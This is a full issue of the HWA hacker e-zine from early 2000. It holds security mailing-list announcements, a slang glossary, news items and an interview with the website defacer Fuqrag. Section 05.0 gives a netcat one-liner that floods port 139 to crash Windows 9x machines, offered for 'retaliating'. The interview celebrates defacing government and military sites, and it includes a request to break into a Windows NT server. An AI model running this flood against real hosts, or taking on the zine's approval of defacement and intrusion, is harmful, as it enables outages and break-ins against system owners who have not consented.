in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.

As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.

In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP
(Spanish) which will be moderated by CORE SDI S.A. from Argentina
(the folks that brought you Secure Syslog and the SSH insertion
attack).

What is Security Focus?
-----------------------

Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information. Aside
from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If
you are interested in viewing the staff pages, please see the 'About'
section on www.securityfocus.com.

On the community creating front you will find a set of forums
and mailing lists we hope you will find useful.
A number of them are not scheduled to start for several weeks but
starting today the following list is available:

* Incidents' Mailing List. BUGTRAQ has always been about the
  discussion of new vulnerabilities. As such I normally don't approve
  messages about break-ins, trojans, viruses, etc with the exception
  of wide spread cases (Melissa, ADM worm, etc). The other choice
  people are usually left with is email CERT but this fails to
  communicate this important information to others that may be
  potentially affected.

  The Incidents mailing list is a lightly moderated mailing list to
  facilitate the quick exchange of security incident information.
  Topical items include such things as information about rootkits,
  new trojan horses and viruses, source of attacks and tell-tale
  signs of intrusions.

  To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
  of:

      SUBS INCIDENTS FirstName, LastName

Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.

*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online
communities. If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.

On the information resource front you find a large database of
the following:

* Vulnerabilities. We are making accessible a free vulnerability
  database. You can search it by vendor, product and keyword. You
  will find detailed information on the vulnerability and how to fix
  it, as well as links to reference information such as email
  messages, advisories and web pages. You can search by vendor,
  product and keywords. The database itself is the result of culling
  through 5 years of BUGTRAQ plus countless other lists and news
  groups. It's a shining example of how thorough full disclosure has
  made a significant impact on the industry over the last half decade.

* Products. An incredible number of categorized security products
  from over two hundred different vendors.

* Services. A large and focused directory of security services offered
  by vendors.

* Books, Papers and Articles. A vast number of categorized security
  related books, papers and articles. Available to download directly
  from our servers when possible.

* Tools. A large array of free security tools. Categorized and
  available for download.

* News: A vast number of security news articles going all the way
  back to 1995.

* Security Resources: A directory to other security resources on
  the net.

As well as many other things such as an event calendar.

For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.

I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.

I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.

Cheers.

--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an
inventor of the Blowfish, Twofish, and Yarrow algorithms. He served
on the board of the International Association for Cryptologic Research,
EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

    Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
    News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
    Archivist: Brendan Kehoe
    Poof Reader: Etaion Shrdlu, Jr.
    Shadow-Archivists: Dan Carosone / Paul Southworth
                       Ralph Sims / Jyrki Kuoppala
                       Ian Dickinson
    Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[ New ISN announcement (New!!)

Sender: ISN Mailing List
From: mea culpa
Subject: Where has ISN been?
Comments: To: InfoSec News
To: ISN@SECURITYFOCUS.COM

It all starts long ago, on a network far away..

Not really. Several months ago the system that hosted the ISN mail list
was taken offline. Before that occurred, I was not able to retrieve the
subscriber list. Because of that, the list has been down for a while. I
opted to wait to get the list back rather than attempt to make everyone
resubscribe.

As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. They are providing the bandwidth,
machine, and listserv that runs the list now.
Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list. To subscribe, mail listserv@securityfocus.com with
"subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".

As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)

mea_culpa
www.attrition.org

--[ Old ISN welcome message

[Last updated on: Mon Nov 04 0:11:23 1998]

InfoSec News is a privately run, medium traffic list that caters
to distribution of information security news articles. These
articles will come from newspapers, magazines, online resources,
and more.

The subject line will always contain the title of the article, so that
you may quickly and efficiently filter past the articles of no interest.

This list will contain:

o Articles catering to security, hacking, firewalls, new security
  encryption, products, public hacks, hoaxes, legislation affecting
  these topics and more.

o Information on where to obtain articles in current magazines.

o Security Book reviews and information.

o Security conference/seminar information.

o New security product information.

o And anything else that comes to mind..

Feedback is encouraged. The list maintainers would like to hear what
you think of the list, what could use improving, and which parts
are "right on". Subscribers are also encouraged to submit articles
or URLs. If you submit an article, please send either the URL or
the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.
Please do NOT:

* subscribe vanity mail forwards to this list

* subscribe from 'free' mail addresses (ie: juno, hotmail)

* enable vacation messages while subscribed to mail lists

* subscribe from any account with a small quota

All of these generate messages to the list owner and make tracking
down dead accounts very difficult. I am currently receiving as many
as fifty returned mails a day. Any of the above are grounds for
being unsubscribed. You are welcome to resubscribe when you address
the issue(s).

Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson,
Nicholas Brawn, Felix von Leitner, Phreak Moi and
other contributors.

ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/

ISN is Moderated by 'mea_culpa'. ISN is a private list. Moderation of
topics, member subscription, and everything else about the list is
solely at his discretion.

The ISN membership list is NOT available for sale or disclosure.

ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.

Win2k Security Advice Mailing List (new added Nov 30th)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To subscribe:

    send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
    to listserv@listserv.ntsecurity.net

Welcome to Win2K Security Advice! Thank you for subscribing. If you
have any questions or comments about the list please feel free to
contact the list moderator, Steve Manzuik, at steve@win2ksecadvice.net.

To see what you've missed recently on the list, or to research an item
of interest, be sure to visit the Web-based archives located at:
http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec

==============

NTSecurity.net brings the security community a brand new (Oct 99) and
much-requested Windows security mailing list.
This new moderated mailing list, Win2KSecAdvice (formerly NTSecAdvice,)
is geared towards promoting the open discussion of Windows-related
security issues.

With a firm and unwavering commitment towards timely full disclosure,
this new resource promises to become a great forum for open discussion
regarding security-related bugs, vulnerabilities, potential exploits,
viruses, worms, Trojans, and more. Win2KSecAdvice promotes a strong sense
of community and we openly invite all security minded individuals, be
they white hat, gray hat, or black hat, to join the new mailing list.

While Win2KSecAdvice was named in the spirit of Microsoft's impending
product line name change, and meant to reflect the list's security focus
both now and in the long run, it is by no means limited to security
topics centered around Windows 2000. Any security issues that pertain to
Windows-based networking are relevant for discussion, including all
Windows operating systems, MS Office, MS BackOffice, and all related
third party applications and hardware.

The scope of Win2KSecAdvice can be summarized very simply: if it's
relevant to a security risk, it's relevant to the list.

The list archives are available on the Web at http://www.ntsecurity.net,
which include a List Charter and FAQ, as well as Web-based searchable
list archives for your research endeavors.
SAVE THIS INFO FOR YOUR REFERENCE:

To post to the list simply send your email to
win2ksecadvice@listserv.ntsecurity.net

To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
listserv@listserv.ntsecurity.net

Regards,

Steve Manzuik, List Moderator
Win2K Security Advice
steve@win2ksecadvice.net

@HWA

00.3 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+

Foreign Correspondents/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland
Wyze1.............................: South Africa

Please send in your sites for inclusion here if you haven't already,
also if you want your emails listed send me a note ...
- Ed

Spikeman's site is down as of this writing, if it comes back online it
will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you
   count paying taxes ... in which case we work for the gov't in a
   BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of
   recent news events it's a good idea to check out issue #1 at least
   and possibly also the Xmas issue for a good feel of what we're all
   about otherwise enjoy - Ed ...

@HWA

00.4 What's in a name? why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Praetorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pigeonholed with those 'dumb
leet (l33t?) dewds' this is the state of affairs. It ain't
Steven Levy's HACKERS anymore. BTW to all you up and comers, i'd
highly recommend you get that book. Its almost like buying a clue.
Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq,
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:

Some of the stuff related to personal usage and use in this zine are
listed below: Some are very useful, others attempt to deny any
possible attempts at eschewing obfuscation by obscuring their
actual definitions.

@HWA    - see EoA ;-)

!=      - Mathematical notation "is not equal to" or "does not equal"
          ASC(247) "wavy equals" sign means "almost equal" to. If written
          as =/= (equals sign with a slash thru it) also means !=, =< is
          Equal to or less than and => is equal to or greater than (etc,
          this aint fucking grade school, cripes, don't believe I just
          typed all that..)

AAM     - Ask a minor (someone under age of adulthood, usually <16, <18
          or <21)

AOL     - A great deal of people that got ripped off for net access by a
          huge clueless isp with sekurity that you can drive buses
          through, we're not talking Kung-Fu being none too good here,
          Buy-A-Kloo maybe at the least they could try leasing one??

*CC     - 1 - Credit Card (as in phraud)
          2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC     - Chaos Computer Club (Germany)

*CON    - Conference, a place hackers crackers and hax0rs among others go
          to swap ideas, get drunk, swap new mad inphoz, get drunk, swap
          gear, get drunk watch videos and seminars, get drunk, listen to
          speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
           hacker speak he's the guy that breaks into systems and is
           often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice
           dip, I like jalapeno pepper dip or chives sour cream and
           onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger
          Vanilla Ice is a wigger, The Beastie Boys and rappers speak
          using ebonics, speaking in a dark tongue ... being ereet, see
          pheer

EoC     - End of Commentary

EoA     - End of Article or more commonly @HWA

EoF     - End of file

EoD     - End of diatribe (AOL'ers: look it up)

FUD     - Coined by Unknown and made famous by HNN - "Fear uncertainty
          and doubt", usually in general media articles not high brow
          articles such as ours or other HNN affiliates ;)

du0d    - a small furry animal that scurries over keyboards causing
          people to type weird crap on irc, hence when someone says
          something stupid or off topic 'du0d wtf are you talkin about'
          may be used.

*HACKER - Read Steven Levy's HACKERS for the true definition, then see
          HAX0R

*HAX0R  - 1 - Cracker, hacker wannabe, in some cases a true hacker, this
          is difficult to define, I think it is best defined as pop
          culture's view on The Hacker ala movies such as well erhm
          "Hackers" and The Net etc... usually used by "real" hackers or
          crackers in a derogatory or slang humorous way, like 'hax0r me
          some coffee?' or can you hax0r some bread on the way to the
          table please?'
          2 - A tool for cutting sheet metal.

HHN     - Maybe a bit confusing with HNN but we did spring to life around
          the same time too, HWA Hax0r News.... HHN is a part of HNN ..
          and HNN as a proper noun means the hackernews site proper.
          k? k. ;&

HNN     - Hacker News Network and its affiliates
          http://www.hackernews.com/affiliates.html

J00     - "you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI - Missing on/from IRC

NFC     - Depends on context: No Further Comment or No Fucking Comment

NFR     - Network Flight Recorder (Do a websearch) see 0wn3d

NFW     - No fuckin'way

*0WN3D  - You are cracked and owned by an elite entity see pheer

*OFCS   - Oh for christ's sakes

PHACV   - And variations of same
          Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups
          Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking
                      C - Cracking
                      V - Virus
                      W - Warfare
                      A - Anarchy (explosives etc, Jolly Roger's
                          Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                      CT - Cyber Terrorism

*PHEER  - This is what you do when an ereet or elite person is in your
          presence see 0wn3d

*RTFM   - Read the fucking manual - not always applicable since some
          manuals are pure shit but if the answer you seek is indeed in
          the manual then you should have RTFM you dumb ass.

TBC     - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA     - To Be Arranged/To Be Announced also 2ba

TFS     - Tough fucking shit.

*w00t   - 1 - Reserved for the uber ereet, no one can say this without
          severe repercussions from the underground masses. also "w00ten"
          2 - Cruciphux and sAs72's second favourite word (they're both
          shit stirrers)

*wtf    - what the fuck, where the fuck, when the fuck etc ..

*ZEN    - The state you reach when you *think* you know everything (but
          really don't) usually shortly after reaching the ZEN like state
          something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.

* all the people who sent in cool emails and support

FProphet    Pyra        TwstdPair   _NeM_
D----Y      Dicentra    vexxation   sAs72
Spikeman    p0lix       Vortexia    Wyze1
Pneuma      Raven       Zym0t1c     duro
Repluzer    astral      BHZ         ScrewUp
Qubik       gov-boi     _Jeezus_    Haze_
thedeuce    ytcracker   loophole    BlkOps

Folks from #hwa.hax0r.news and #fawkerz, and other leet secret channels,
mad props! ... ;-)

Ken Williams/tattooman ex-of PacketStorm,

& Kevin Mitnick

Kevin is due to be released from federal prison on January 21st 2000,
for more information on his story visit http://www.freekevin.com/

kewl sites:

+ http://blkops.venomous.net/ NEW
+ http://www.hack.co.za NEW
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't
 always popular..."
                     - FProphet '99

+++ When was the last time you backed up your important data?

++ FBI Investigating 20 Y2K threats

   The FBI said Thursday it had moved to thwart up to 20 or so possible
   threats against targets such as power plants and computer networks
   during a heightened security watch that started before 2000 dawned.

   Read the article at:
   http://www.zdnet.com/zdnn/stories/news/0,4586,2418190,00.html?chkpt=zdnntop

++ L0pht joins e-security firm

   L0pht Heavy Industries to serve as research and development arm for
   new company hoping to secure e-commerce.
   CAMBRIDGE, Mass. - Armed with $10 million in venture funding and a
   phalanx of Internet industry veterans, startup firm AtStake Inc. on
   Thursday announced plans to help secure the e-commerce revolution.

   Read the article at:
   http://www.zdnet.com/zdnn/stories/news/0,4586,2417831,00.html?chkpt=zdnntop
   Read the dutch article at:
   http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4054

++ Microsoft under media attack in China

   Software giant Microsoft Corp. has run into more bad publicity in
   China with a newspaper reporting that its latest Windows 2000
   operating system will be barred throughout the government.
    Instead, ministries would use "Red Flag-Linux," a new software
    platform developed by Chinese researchers and based on upstart
    operating system Linux.

    Read the article at:
    http://www.zdnet.com/zdnn/stories/news/0,4586,2417828,00.html
    Read the Dutch article at:
    http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4141

 ++ China will handle piracy

    Unless pirates hand in all their illegal audio- and DVD-copies before
    January 15th, the Chinese authorities will take measures. Pirates may
    then expect heavy penalties.

    Read the (short) Dutch article at:
    http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4140

 ++ Y2K-patch crashes important flight control systems

    Representatives of the American union Professional Airway Systems
    Specialists (PASS) claim that important flight control systems
    crashed because of a Y2K-patch installed by the Federal Aviation
    Administration (FAA). Because of this, airplanes weren't able to take
    off on the East side of the US.

    Read the Dutch article at:
    http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4137

 ++ Clinton declares war on cyberterrorists

    WASHINGTON - The White House planned to announce on Friday new steps
    to protect America's computer systems from hackers and viruses. These
    steps also include education subsidies for college students if they
    agree to work for the government after developing computer-security
    skills.

    Read the article at:
    http://www.zdnet.com/zdnn/stories/news/0,4586,2418619,00.html?chkpt=zdnntop

 ++ Teen hacks 27 ISPs, gains root access

    A 16-year-old hacker affiliated with the cybergang known as Global
    Hell compromised at least 27 Internet service providers late last
    year, stealing passwords and, in some cases, destroying data,
    according to details of a police investigation released Monday.
    Read the article at:
    http://www.zdnet.com/zdnn/stories/news/0,4586,2419466,00.html?chkpt=zdnntop

 ++ Data thief blackmails e-tailer

    eUniverse (an online retailer) confirmed Monday that it was the
    victim of a data theft and virtual blackmail attempt over the
    weekend. A 19-year-old Russian hacker blackmailed CD Universe into
    paying $100 000, otherwise he would publish thousands of credit card
    codes on the net, and so he did.

    Read the article at:
    http://www.zdnet.com/zdnn/stories/news/0,4586,2419750,00.html
    Read the Dutch article at:
    http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4173

 ++ Reno rallies cybercrime fighters

    U.S. Attorney General Janet Reno on Monday outlined plans for the
    federal government to battle all cybercrime by teaming up with U.S.
    states to establish a secure online information clearinghouse.

    Read the article at:
    http://www.zdnet.com/zdnn/stories/news/0,4586,2419984,00.html

    Thanks to myself for providing the info from my wired news feed and
    others from whatever sources, Zym0t1c and also to Spikeman for sending
    in past entries.... - Ed

 @HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Yeah we have a message board, feel free to use it, remember there are
     no stupid questions... well there are but if you ask something really
     dumb we'll just laugh at ya, let's give the message board a bit more
     use eh? i'll be using a real message board when the hwa-iwa.org
     domain comes back online (soon?) meanwhile the beseen board is still
     up...

==============================================================================

02.0 From the editor.
     ~~~~~~~~~~~~~~~~

     #include
     #include
     #include

     main()
     {
      printf ("Read commented source!\n\n");

     /*
      * Hey, the world didn't end at 23:59 12/31/99 wow huh?
      * well i've been busy so you're getting more than two weeks worth
      * of news in one issue. Sorry if this doesn't waggle yer wig but
      * I decided it would be better than releasing two issues again.
      *
      * This issue sports a few interviews with underground figures
      * if there is anyone that you'd like interviewed or want to
      * offer yourself up, email me and we'll work something out, or
      * at least try to. Meanwhile, enjoy the issue and tty next time
      *
      * This issue: fuqrag, ytcracker and mosthated.
      *
      * Cruci
      *
      * cruciphux@dok.org
      * ICQ:58939315 note; not always online, do not abuse!
      * Preferred chat method: IRC Efnet in #HWA.hax0r.news
      *
      */

      printf ("EoF.\n");
     }

     Snailmail:

       HWA NEWS
       P.O BOX 44118
       370 MAIN ST. NORTH
       BRAMPTON, ONTARIO
       CANADA
       L6V 4H5

     Congrats, thanks, articles, news submissions and kudos to us at the
     main address: hwa@press.usmc.net complaints and all nastygrams and
     mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
     127.0.0.1, private mail to cruciphux@dok.org

     danke.

     C*:.

 -= start =--= start =--= start =--= start =--= start =--= start =--= start

                             Content Start

 -= start =--= start =--= start =--= start =--= start =--= start =--=

03.0 www.2600.com, jokers to the end?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     On New Year's Day visitors to the venerable 2600.com site were greeted
     with the following:

       Internal Server Error

       The date specified (01-01-1900) is impossible. If you have forced
       this error condition, you may be in violation of state, federal,
       and/or civil laws. Those outside the United States should check
       with their respective governments concerning their country's
       extradition treaty. Dissemination of this error is also strictly
       prohibited. If you believe you have received this message in error,
       please reload the page and try again.
     -=-

     It looks realistic but we're pretty sure that it was not generated by
     the server and is actually a phake error message... - Ed

 @HWA

04.0 More irc4all proxies (01/03/00)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     The info from below is taken from the site located at
     http://www.lightspeed.de/irc4all/ it offers an up to date list of
     various proxies, mostly public, some not, check it out for further
     details. - Ed

 @HWA

05.0 Simple Windows DoS using common tools and UDP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HWA labs: Twstdpair

     This is a very simple but deadly windows DoS that appears to work on
     all Win9x boxes. You need a large binary file as the datafile
     (fuckfile.bin) to create a long stream of data, we used an 80 meg
     binary file for test purposes, essentially you will be flooding the
     well known netbios TCP/UDP port 139, in this case we'll be attacking
     with UDP packets. The result is that the attacked system will falter
     and eventually fail making it essentially useless and losing net
     connection.

     "Discovered" accidentally by Twstdpair, when retaliating against some
     unruly port scanning kiddies harassing his system. :-p

     Usage:

     You need netcat for this example.
> cat fuckfile.bin | nc -u 24.111.111.111 139 You can issue this attack from *nix boxes or from windows using the windows netcat port. System will become unresponsive and eventually die. @HWA 06.0 Slash interviews website defacer/cracker Fuqrag Jan 10th 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HWA Exclusive. You may reproduce this if credit is given for the source, quote http://welcome.to/HWA.hax0r.news, an HNN affiliate. sure.. why not > Tell us something about You ? ! > How did U start defacing > ? well.. there are tons of reasons why i did what i did.. (and still might do.. not sure yet) but.. i started mostly cause i was extremely bored > bored ?! yeah.. as in had nothing else better to do > :))) > so U started defacing..... plus.. i was also depressed over my gf dumping me.. > :) > :( and some other things as well yeah.. i'd never been into defacing shit before > how llong have U been hacking !? didn't really have a reason to damn.. let's see.. i just turned 30 back in october and i've been in the scene since like when i was 12 so.. damn.. that's a long time > :))))) > that's long > how did U start hacking !?? ! > was it the BBS age back then !? hangin out with the wrong (or maybe right) people on bbs's .. shit like that > so why did U stop defacing !? mostly to take a break... and give the .gov's & .mil's a break as well.. as well as every 1 else in between > but why did U hit all those high profiled sites > !?! > why .mil and .gov the bigger the better i figured this.. it's like.. if you're gonna scream your head off.. then get on top of the biggest buildings.. and then scream > Is there an defacment that U'r most proud of > ? hmm.. several actually hard to pick just 1 > which R that !? the NSA website, DiSA, deca.mil, usitc.gov, the coe.fr, and probably the intelsat.int, as well as the 2 nato sites.. 
also kingston.com that was my last 1 and it was on thanksgiving day ;) > :) and let's not forget dairyqueen heh > hehe > U declared war to the Government on U'r deca.mil defacment right !? sorta but not really pretty much every 1 any 1 with power that abuses it (be it country or company) > What do You think of the FBI ?!:) you really wanna know what i think about the fbi? uhmm.. ok they're a bunch of fuckin morons > :)))) > that's true > :) > U ain't afraid to get raided !? yeah not really > how is that !? fuck'em if they can't take a joke! i mean like.. what's to be afraid of ya know? > well.... > U can go to jail the worst that can happen is i go to prison.. > well, that's it > U goto jail > and U'r life is all fucked up yeah.. but as long as i remain who i am, as an individual... > U can't get a job in my thoughts.. my beliefs.. > everyone thinks U killed somebody > I'll tell U sumtin > Hacking changed my life > for good > That's my obsesion > Hacking is a state of mind baby > and I don't give a fuck If I get raided i agree > do U ? absolutely > I meen i know the defacing stuff is not cool > yeah > but > I deface to spread the message out > I don't give a fuck about fame > fame meens nothing to me neither do i tell ya the truth... i honestly didn't think any 1 would care or even notice i figured that there was so much shit already being hit before i came along.. that i didn't think it would really matter > But people did notice and i'm not really into interviews and stuff.. but, that's why only people like you, and osall, etc.. not the nytimes.. or cnn, etc.. shit like that i know they did if i'd known that i was gonna get the kindof attention that i have gotten before i started... i would've re-thought my actions i'm actually a very private person usually keep to myself most of the times > U married !? > :) heh no > :( > so what do U do in U'r life !? me and my ex- were together 3+ years.. we were suppose to get married like next summer.. but.. 
oh well actually.. i'm a freelance security consultant ;) > :) > that suits U fine yeah.. but i went to filmschool > yeah !? that's what i use to wanna do and maybe some day i still will.. who knows > "Hackers the sequel " by fuqraq heheh uhmm.. not quite i was interviewed for a documentary awhile back though it's called: "Hackers, Crackers, and Lamers" > no shit > :))) some chick that does documentaries for cnn or some shit yeah they actually filmed me doing "live-hacks" > U heard of flipz !? > :) heh yeah > U 2 know each other !? we have our differences from time to time.. but.. we always end up still being good friends > kewl he annoys the shit out of me.. but he's still cool > U were in gH and sSH ?! gH yes.. sSh no.. > no !? even though they put me on their member's list (i dunno why).. i was never a member > I thought I saw U in their members list not even an affiliate sSh is a bunch of lamers with nuthin better to do > U plan to start hacking again ? dude.. i'm always hackin > :))) > aaight just not defacin right at the moment and not nt bawx's either > NT sux i fuckin hate nt yeah it does > I advise people to put BSD or SunOS > but no yeah.. > They R smarter than me > "We will put what we want" i run linux (SuSE), and NetBSD mostly > They:"sumtin what is easy to use" > ME: "Sumting that is easy to penetrate in" heheh > They:"U'r fired" definitely the latter ME: aight.. go ahead and be a loser heheh > ME:" ok, just wait till I get home and find some sploit for Youre box" > heheh no doubt > bsd is coo > Never tried suse doh i like it SuSE is nice > I heard it comes on 7 cd-s 6 > heh ;) > U code !? a little > c !? > perl !? some c (just startin to get really heavy in it) perl, shell script, pascal yes.. i do have pascal on my linux bawx > :))) heh > I have VB on my linux box really..? > can U belive it !? under wine? > y coz.. under windows.. i do mostly vb > no shit > me too yeah.. 
i love vb > it's good i got started usin it years back, when i was makin front-ends for access db's also do some xbase legacy code (like fox pro, etc..) > I started programing in qb firsth > I knew only 1 command > U know what that was !? yeah.. me too actually.. i started with gwbasic > kewl under like dos 3.1 or some shit like that > the first command I learned in qb was.... > BEEP > :)))))) heh that's cool > Than i started learning > IF then ahhh.. the memories > for NExtT > N shit > then came VB > winsock programing > aaaaaargghhhhhh > winsock1.open > shit > :))))) heh > It's coo to program > to know how to program yeah it is > U on win box now !? most people take it for granted no linux > k i'm always in unix of some sort > aaight > dewd lately i've been rewtin bawx's in china & korea ya? > can U do me a favor !? what's that? > www.akz.hr > I'm kinda admin on that box > can U check it out > do a /whois slasht sure.. > U'll see I come from rtr.akz.hr > don't deface plz > I know U can :)))) heh.. i won't > just gimme some proof what do u want me to do.. just check it out on security and shit? > yeah > winNT 40 > :))) ok.. > k but.. > what !? i'm not really that much into nt.. > well, just try and i only know a few ways of gettin in.. that's about it > ok > I'm a shitty admin > so It shouldn't be a problem > :)))))) well.. > well... > ? nt isn't that hard to admin > I know > :))))) and on top of that i don't know all of the vulnerabilities for nt > I'm kinda into solaris 'n stuph me too i won't say that i don't use scripts.. sure i do.. every 1 does.. but, when it comes to nt, that's usually how i've had to get in.. except maybe port 139.. and even then so i guess i could sit around and try to brute ur pop3 > :))) every 1 